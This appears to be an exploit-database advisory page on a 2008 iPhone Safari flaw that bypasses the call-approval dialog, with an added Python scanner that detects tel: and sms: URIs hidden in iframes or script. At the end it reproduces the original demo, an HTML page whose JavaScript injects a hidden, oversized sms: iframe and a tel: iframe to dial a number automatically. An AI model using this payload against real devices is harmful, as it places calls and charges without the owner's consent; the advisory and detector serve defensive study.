Vendor: iPhone and iPod touch
By: Collin Mulliner
CVSS: 7.5 (HIGH)
Vulnerability type: Security-Bypass Vulnerability
CWE: 284
Product Name: iPhone and iPod touch
Affected Version From: iPhone and iPod touch Prior to Version 3.0
Affected Version To: iPhone and iPod touch Prior to Version 3.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner

Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically. Successfully exploiting this issue may allow attackers to bypass Mail's call-approval dialog and place a call automatically from a vulnerable device. An attacker can exploit this issue by creating a malicious HTML page containing specially crafted JavaScript.
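As an added, defender-side example (not part of the advisory and not Collin Mulliner's demo), the following Python script statically scans an HTML document for the pattern the advisory describes: tel:/sms: URIs placed in iframe src attributes, or assembled inside inline script, where document.write-style injection hides them from a check that only inspects the static DOM. It also flags any such URI longer than an assumed sanity threshold of 256 characters. The sample HTML inputs, the threshold and the verdict labels are constructed for this example. A static scan can only see literal fragments; the length of a URI built in a loop at runtime is not visible to it.

```python
# Added example: static detection of the tel:/sms:-in-iframe pattern.
# Not code from the advisory or from Collin Mulliner's demo.
import re
from html.parser import HTMLParser

# A dial-scheme URI: tel: or sms: followed by anything up to a delimiter.
DIAL_URI = re.compile(r'\b(?:tel|sms):[^"\'\s<>\\]*', re.IGNORECASE)

# Assumed sanity threshold for a phone/SMS URI (constructed heuristic;
# real recipients are a few dozen characters at most).
MAX_SANE_URI_LEN = 256


class DialSchemeScanner(HTMLParser):
    """Collect tel:/sms: URIs from iframe/frame src attributes and from
    inline <script> text, where document.write-style injection hides them
    from a check that only looks at the static DOM."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._script_buf = None  # non-None while inside <script>

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script_buf = []
        elif tag in ("iframe", "frame"):
            for name, value in attrs:
                if name == "src" and value and DIAL_URI.match(value.strip()):
                    self._record("iframe_src", value.strip())

    def handle_data(self, data):
        # HTMLParser may deliver script content in several chunks
        # (it splits on every "</" it meets), so buffer and scan at the end.
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            for m in DIAL_URI.finditer("".join(self._script_buf)):
                self._record("script_literal", m.group(0))
            self._script_buf = None

    def _record(self, where, uri):
        self.findings.append({
            "where": where,
            "scheme": uri.split(":", 1)[0].lower(),
            "length": len(uri),
            "uri": uri[:40],  # keep the report short for long payloads
        })


def scan_html(html):
    """Return the list of dial-scheme findings in an HTML document."""
    scanner = DialSchemeScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def assess(html):
    """Summarise findings as sorted verdict labels (constructed names)."""
    findings = scan_html(html)
    verdict = set()
    if any(f["where"] == "iframe_src" for f in findings):
        verdict.add("iframe_dial_uri")
    if any(f["where"] == "script_literal" for f in findings):
        verdict.add("script_builds_dial_uri")
    if any(f["length"] > MAX_SANE_URI_LEN for f in findings):
        verdict.add("oversized_dial_uri")
    return sorted(verdict)


# Constructed sample inputs.
# A plain tel: link needs a user tap, so it is not flagged.
BENIGN_HTML = '<html><body><a href="tel:+10000000000">Call us</a></body></html>'

# Same shape as the demo on this page, shortened: script assembles an sms:
# iframe in a loop and a tel: iframe, then writes both into the document.
INJECTED_HTML = r'''<html><body><script>
var l = "<iframe src=\"sms:";
for (var i = 0; i < 3; i++) { l = l + "0"; }
l = l + "\" width=10 height=10></iframe><iframe src=\"tel:+10000000000\" height=10 width=10></iframe>";
document.write(l);
</script></body></html>'''

# A static iframe whose sms: URI is far longer than any real recipient.
STATIC_LONG_HTML = ('<html><body><iframe src="sms:' + "0" * 300
                    + '"></iframe></body></html>')

if __name__ == "__main__":
    for name, doc in [("benign", BENIGN_HTML), ("injected", INJECTED_HTML),
                      ("static_long", STATIC_LONG_HTML)]:
        print(name, assess(doc), scan_html(doc))
```

The scanner deliberately ignores tel: anchors, since those still require a tap; the signal worth alerting on is a dial-scheme URI that loads without user interaction (an iframe) or is constructed in script so that a DOM-only check misses it.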

Mitigation:

Users should avoid visiting untrusted websites or following links provided by unknown or untrusted sources.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/35425/info
  
Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically.
  
Successfully exploiting this issue may allow attackers to bypass Mail's call-approval dialog and place a call automatically from a vulnerable device.
  
NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it.
  
<html>
<head>
<title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title>
</head>
<body>
<script lang=javascript>
// Build a hidden iframe whose sms: URI is padded to an enormous length
l = "<iframe src=\"sms:";
for (i = 0; i < 10000; i++) {
    l = l + "3340948034298232";
}
// Close it and add a second hidden iframe with a tel: URI, then inject both
l = l + "\" width=10 height=10></iframe><iframe src=\"tel:+12345\" height=10 width=10></iframe>";
document.write(l);
</script>
</body>
</html>